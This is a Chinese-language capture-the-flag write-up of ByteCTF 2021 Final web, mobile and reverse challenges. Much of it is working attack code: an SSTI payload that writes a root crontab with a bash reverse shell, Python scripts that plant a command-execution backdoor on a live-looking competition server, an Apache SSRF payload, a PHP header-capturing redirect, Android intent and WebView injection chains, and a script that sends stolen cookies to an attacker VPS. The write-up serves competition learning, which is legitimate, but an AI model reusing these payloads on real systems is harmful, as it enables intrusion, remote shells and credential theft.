ByteCTF 2021 Final By W&M

admin 2024年9月13日22:05:45评论3 views字数 108091阅读360分18秒阅读模式

WEB

SEO

ByteCTF 2021 Final By W&M

到处点首页有一堆api/xxx.php。这里能下载文件。抓到

api/word.php?src=6b77af.txt

读源码。/api/ip.php

<?php
error_reporting(0);

$domain = $_POST['domain'];
$ip = "1.1.1.1";
$site_title = "";
$content = "";

try {
    $ip = gethostbyname($domain);
} catch (Exception $e)
{
    $ip = "域名解析异常";
}

if(!preg_match("/file:/i", $domain)){
    try {
        $c = curl_init();
        curl_setopt($c, CURLOPT_URL, $domain);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
        $data = curl_exec($c);
        $content = base64_encode($data);
        curl_close($c);
        $pos = strpos($data,'utf-8');
        if($pos===false){
            $data = iconv("gbk","utf-8",$data);
        }
        preg_match("/<title>(.*)<\/title>/i",$data, $title);
        $site_title =  $title[1];
    } catch (Exception $e)
    {
        $content = "error";
        $site_title = "网站访问异常";
    }
} else
{
    $content = "error";
    $site_title = "网站访问异常";
}



$ip_addr = array (
    "ip" => $ip,
    "title" => $site_title,
    "res" => $content
);

header('Content-Type:text/json;charset=utf-8');
$ip_json = json_encode($ip_addr);
echo $ip_json;

http://IP/扫一遍。再读/proc/net/arp

ByteCTF 2021 Final By W&M

再扫100的端口。得到3306.然后gopher写udf-命令执行

bytehouse

clihouse。列数据库发现有information_Schema。可能链接mysql的

报错得到jdbc的链接字符串

ByteCTF 2021 Final By W&M

jdbc mysql任意文件读。

读cmdline等文件

%java-XX:+UseContainerSupport-XX:+IdleTuningCompactOnIdle-XX:+IdleTuningGcOnIdle-Xdump:none-Xdump:tool:events=systhrow+throw,filter=*OutOfMemoryError,exec=kill -9 %pid-Dlog4j.configuration=file:////app/log4j.properties-Dnashorn.args=--language=es6-jarclickhouse-jdbc-bridge-shaded.jar

知道是用clickhouse-jdbc-bridge-shaded.jar起的

https://github.com/ClickHouse/clickhouse-jdbc-bridge/tree/master/misc/quick-start

ByteCTF 2021 Final By W&M

docker下下来有个logs

用jdbc mysql读文件读logs的console.log

ByteCTF 2021 Final By W&M

拿密码查下flag就行

ByteCTF 2021 Final By W&M

nothing

1 ByteCTF[length]=4000绕过ByteCTF.length检测
2 ByteCTF[toString][]=使 字符串+ByteCTF+字符串 报错
3 由于exec没有降权,所以可以kill掉父进程 node。kill掉node,在node被脚本拉起之前,自己生一个生瓜蛋子占用:3000,启动自己的服务来回显(/tmp目录似乎不可写,用node -e直接传脚本执行)
(或者:用kill掉node 导致 http请求失败,来cut盲注flag,但是不稳定 
[ `cut -b 1 /flagfilename` == x ] && pkill node)
//evil.js
const express = require('express')
const fs = require('fs')
const execSync = require('child_process').execSync;
const app = express()

app.get('/yyds', (req, res) => { //防蹭车
    res.send("SUCCESS:"+execSync(req.query.asdasdasdx).toString())
    res.end()
})

app.listen(3000, () => {
  console.log(`listening at port 3000`)
}) 
import requests
import base64
remote_url = "http://39.106.69.116:30001/?ByteCTF[length]=4000&ByteCTF[toString][]=&backdoor="

def encode(sth):
    result = ""
    for i in sth:
        result += "%%%02x" % ord(i)
    return result

def execute_command(cmd):
    url = remote_url + encode(cmd)
    r = requests.get(url,proxies={"http":"http://localhost:4476"})
    return r.status_code


evil_js_b64 = None
with open("evil.js","rb") as file:
    evil_js_b64 = file.read()
    evil_js_b64 = base64.b64encode(evil_js_b64).decode()

while 1:
    execute_command(f"pkill node;node -e \"`echo {evil_js_b64} | base64 -d`\"")
import requests
import base64
remote_url1 = "http://39.106.69.116:30001/yyds?asdasdasdx="

def encode(sth):
    result = ""
    for i in sth:
        result += "%%%02x" % ord(i)
    return result


def fetch_result(cmd):
    url = remote_url1 + encode(cmd)
    r = requests.get(url,proxies={"http":"http://localhost:4476"})
    return r.text if "SUCCESS:" in r.text else None


while 1:
    #fetch_result("ls /")
    a = fetch_result("cat /Th1s_1s_f1a9_31567878cd3283f5d02ccd5ea1d15aafadf1943ae39180ad96e74f3f0c1bbc3e")
    if a:
        print(a)

ByteCTF 2021 Final By W&M

bytectf{50579195da002fa989432cbc1a83e38f5d3765122d9a7d4d767f99a61fa58f22}

Babyweb

golang ssti gin的框架

用户名ssti

能上传任意文件 写crontab 反弹shell

{{.SaveUploadedFile (.FormFile "glzjin1") "/var/spool/cron/crontabs/root"}}

ByteCTF 2021 Final By W&M

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.F1jRTz/crontab installed on Sat Dec 11 12:53:26 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h  dom mon dow   command

* * * * * bash -c 'bash -i >& /dev/tcp/xxx/9999 0>&1'

proxy

可以用apache2.4.48那个cve进行内网ssrf

GET /proxy?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://internal/fetch

通过这种方式可以SSRF到内网的python服务 然后发现python是requests发包 使用proxy进行代理认证

使用https 302 将请求头保存下来即可完成

1.php

<?php
file_put_contents("xxx.log",json_encode($_SERVGER));
header('location: https:/xxxxx/xxxx/2.php');?>

2.php

<?php

header('location: https://xxxx/xxxx/1.php')

用url参数请求1.php

拿到认证头解密即可

ByteCTF 2021 Final By W&M

Mobile

HardDroid

1. 反射构造hearachical Uri绕过

在程序中直接从 Intent 中取 Uri,并且对取出的内容检验了 Host 和 Scheme,但是在通过 loadUrl 的时候没有经过 Uri.parse,而是通过 toString 来放到了loadUrl中,造成可以通过反射构造 hearachical Uri 绕过,在 https://www.anquanke.com/post/id/182420 文章中有提到对应的利用思路。

ByteCTF 2021 Final By W&M

其中也提到了,在高版本中,反射调用会在运行时报错失败。

ByteCTF 2021 Final By W&M

由于这道题使用的是Android API 30,也就是 Android R,存在 Google 的这个限制,所以我们通过它给出绕过方法中的链接:https://github.com/tiann/FreeReflection,使用 FreeReflection 这个工具来进行攻击,其原理在 https://weishu.me/2018/06/07/free-reflection-above-android-p/ 中被详细解释,我们这边直接拿来用就好。

我将其封装为一个类来进行调用

public Uri getUri(String attackerUri) {
    String TAG = "WJH";
    Uri uri;
    try {
        Class partClass = Class.forName("android.net.Uri$Part");
        Constructor partConstructor = partClass.getDeclaredConstructors()[0];
        partConstructor.setAccessible(true);

        Class pathPartClass = Class.forName("android.net.Uri$PathPart");
        Constructor pathPartConstructor = pathPartClass.getDeclaredConstructors()[0];
        pathPartConstructor.setAccessible(true);

        Class hierarchicalUriClass = Class.forName("android.net.Uri$HierarchicalUri");
        Constructor hierarchicalUriConstructor = hierarchicalUriClass.getDeclaredConstructors()[0];
        hierarchicalUriConstructor.setAccessible(true);

        Object authority = partConstructor.newInstance("app.toutiao.com", "app.toutiao.com");
        Object path = pathPartConstructor.newInstance("@" + attackerUri, "@" + attackerUri);
        uri = (Uri) hierarchicalUriConstructor.newInstance("http", authority, path, null, null);

        Log.d(TAG, "Scheme: " + uri.getScheme());
        Log.d(TAG, "Authority: " + uri.getAuthority());
        Log.d(TAG, "UserInfo: " + uri.getUserInfo());
        Log.d(TAG, "Host: " + uri.getHost());
        Log.d(TAG, "toString(): " + uri.toString());
    } catch (Exception e) {
        throw new RuntimeException(e);
    }
    return uri;
}

2.调用内部未 exported 类

根据初赛的题目我了解过这个思路,这里可以参考 http://blog.wjhwjhn.com/archives/613/ 这篇文章,这里简单的做一个说明。

在 MainActivity 中,程序对 shouldOverrideUrlLoading 进行了一个重写,并且在访问链接的 scheme 为 intent的情况下会进行一个拦截,同时先通过 parseUri 来解析传入参数,再使用 startActivity 对传入内容进行一个启动。这个来自内部的启动,使得我们可以调用内部的类。

这里在转换时需要选择 Intent.URI_INTENT_SCHEME 的这种形式,可以转换出可以被直接访问到的 Uri

Intent i2 = new Intent();
i2.setClassName("com.bytectf.harddroid", "com.bytectf.harddroid.TestActivity");
i2.setData(Uri.parse("http://app.toutiao.com"));
String uri_data = i2.toUri(Intent.URI_INTENT_SCHEME);

3.Universal-XSS

相关操作可以参考 https://twitter.com/_bagipro/status/1326511441306935296

在 TestActivity 类中,我们可以通过在启动时写一个 Intent.FLAG_ACTIVITY_SINGLE_TOP 标志,使得第二次访问时,没有执行 onCreate 去 重新创建一个 WebView,而是通过 onNewIntent 来调用 loadUrl,在这种情况下,我们可以在第二次调用时来执行 javascript: xxx 这样的语句,从而实现在通过域名白名单的情形下来执行我们恶意的 JavaScript 代码。

ByteCTF 2021 Final By W&M

4.恶意 JS 代码执行

通过分析题目中的 native 函数中的 native_write 函数,可以发现可以指定文件名来进行任意的写入,再结合代码中存在一个对 soPath 是否存在的判定,此判定允许二次载入 so 文件,不难想到我们可以通过 native_write 来在目录下写入一个 恶意的 so 文件,在此 so 文件的 JNI_Onload 函数中做一个实现,使得这个恶意的 so 文件可以在 JAVA 程序 load 之后将目录下的 flag 读出并访问我们指定的 web 链接从而带出 flag,可惜的是我之前都没接触过 native 文件的编写,于是拜托了战队中的 RE 神 —— 源神来搞定了这部分!源哥 yyds!

html 中的三次跳转代码解释

  1. 传入 url 参数跳转内容,实际上就是我们要跳转到的 http://app.toutiao.com 白名单网址
  2. 去通过 Intent.FLAG_ACTIVITY_SINGLE_TOP 标志(launchFlags=0x20000000)去执行 JavaScript,从而调用到 jsi 中的写函数,把恶意的 so 文件写出到目录下。
  3. 等待写入后再去访问白名单网址,此时会检测到 soPath 的文件内容存在,同时使用了 System.load 去加载文件,加载中会自动去调用 so 文件中的 JNI_Onload,在其中把 flag 内容带出。
<html>
<body>
    <script>

    function GetQueryString(name)
    {
         var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)");
         var r = window.location.search.substr(1).match(reg);
         if(r!=null)return  unescape(r[2]); return null;
    }
    function doitjs()
    {
        location.href = decodeURIComponent(decodeURIComponent(GetQueryString('url')));
    }
    function doitjs2()
    {
        location.href = 'intent:jsi.write_file("/data/user/0/com.bytectf.harddroid/files/libUtils.so", "恶意so文件的base64代码")#Intent;scheme=javascript;launchFlags=0x20000000;component=com.bytectf.harddroid/.TestActivity;end';
    }
    setTimeout(doitjs, 0);
    setTimeout(doitjs2, 3000);
    setTimeout(doitjs, 15000);
    </script>
</body>

</html>

ByteDraid1

1 用..%2F..逃逸路径
2 任意域名均可http://domain/local_cache/ 逃逸到自己的.html文件,因此可以跳转,访问tiktok.com的cookie
3 chmod 777 自己的文件(需要自己的TargetSDKVersion低)
//MainActivity
//TargetSDKVersion越低越好,高了不能chmod 自己的data文件夹

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setup_our_file();
        if(true) {
            Intent target = new Intent();
            target = getPackageManager().getLaunchIntentForPackage("com.bytectf.bytedroid1");
            target.setData(Uri.parse("http://bytectf.toutiao.com/local_cache/..%2F../com.bytectf.pwnbytedroid1/files/1.html"));
            startActivity(target);
        }
    }
    private void setup_our_file() {
        try {
            Runtime.getRuntime().exec(new String[]{"/system/bin/sh","-c",
                    "mkdir /data/data/com.bytectf.pwnbytedroid1/files;"+
                    "echo '<html><head></head><body>1 page</body><script>window.location.href=\"http://tiktok.com/local_cache/..%2F..%2F..%2F..%2F../data/data/com.bytectf.pwnbytedroid1/files/3.html\";</script></html>' > /data/data/com.bytectf.pwnbytedroid1/files/1.html;"+
                            "chmod 777 /data/data/com.bytectf.pwnbytedroid1/;"+
                            "chmod 777 /data/data/com.bytectf.pwnbytedroid1/files;"+
                            "chmod 777 /data/data/com.bytectf.pwnbytedroid1/files/1.html;" +
                            "echo '<html><head></head><body>3 page</body><script>fetch(\"http://VPS_IP/flag?\"+document.cookie)</script></html>' > /data/data/com.bytectf.pwnbytedroid1/files/3.html;"+
                            "chmod 777 /data/data/com.bytectf.pwnbytedroid1/files/3.html;"
            });
        } catch (IOException e) {
            Log.d("AndroidRuntime","err",e);
            e.printStackTrace();
        }
    }

ByteCTF 2021 Final By W&M

Reverse

byteService

拿到APK文件后,使用Jadx-gui打开APK文件,发现应该是一个考察Binder机制的题目,transact()函数前面16次分别对应的code为1-16,每次transact时传递一个参数过去,当code为17时进行flag的check工作,那么非常明显对应的系统中有一个ByteCTFService的Binder服务端。

public boolean checkText(EditText editText) {
     int i = 0;
     while (i < 16) {
       try {
         char charAt = editText.getText().charAt(i);
         i++;
         callCTFService(i, charAt);
       } catch (AssertionError unused) {
         return false;
       }
     }
     return true;
   }

   public void callCTFService(int i, int i2) {
     try {
       Class<?> cls = Class.forName("android.os.ServiceManager");
       Parcel obtain = Parcel.obtain();
       Parcel obtain2 = Parcel.obtain();
       obtain.writeInterfaceToken("android.os.IByteCTFService");
       obtain.writeInt(i2);
       ((IBinder) cls.getMethod("getService", String.class).invoke(cls.newInstance(), "ByteCTFService")).transact(i, obtain, obtain2, 0);
       obtain2.readException();
     } catch (RemoteException | ClassNotFoundException | IllegalAccessException | InstantiationException | NoSuchMethodException | InvocationTargetException e) {
       e.printStackTrace();
     }
   }

   public boolean checkCTFService() {
     try {
       Class<?> cls = Class.forName("android.os.ServiceManager");
       Parcel obtain = Parcel.obtain();
       Parcel obtain2 = Parcel.obtain();
       obtain.writeInterfaceToken("android.os.IByteCTFService");
       ((IBinder) cls.getMethod("getService", String.class).invoke(cls.newInstance(), "ByteCTFService")).transact(17, obtain, obtain2, 0);
       obtain2.readException();
       return obtain2.readBoolean();
     } catch (RemoteException | ClassNotFoundException | IllegalAccessException | InstantiationException | NoSuchMethodException | InvocationTargetException e) {
       e.printStackTrace();
       return false;
     }
   }

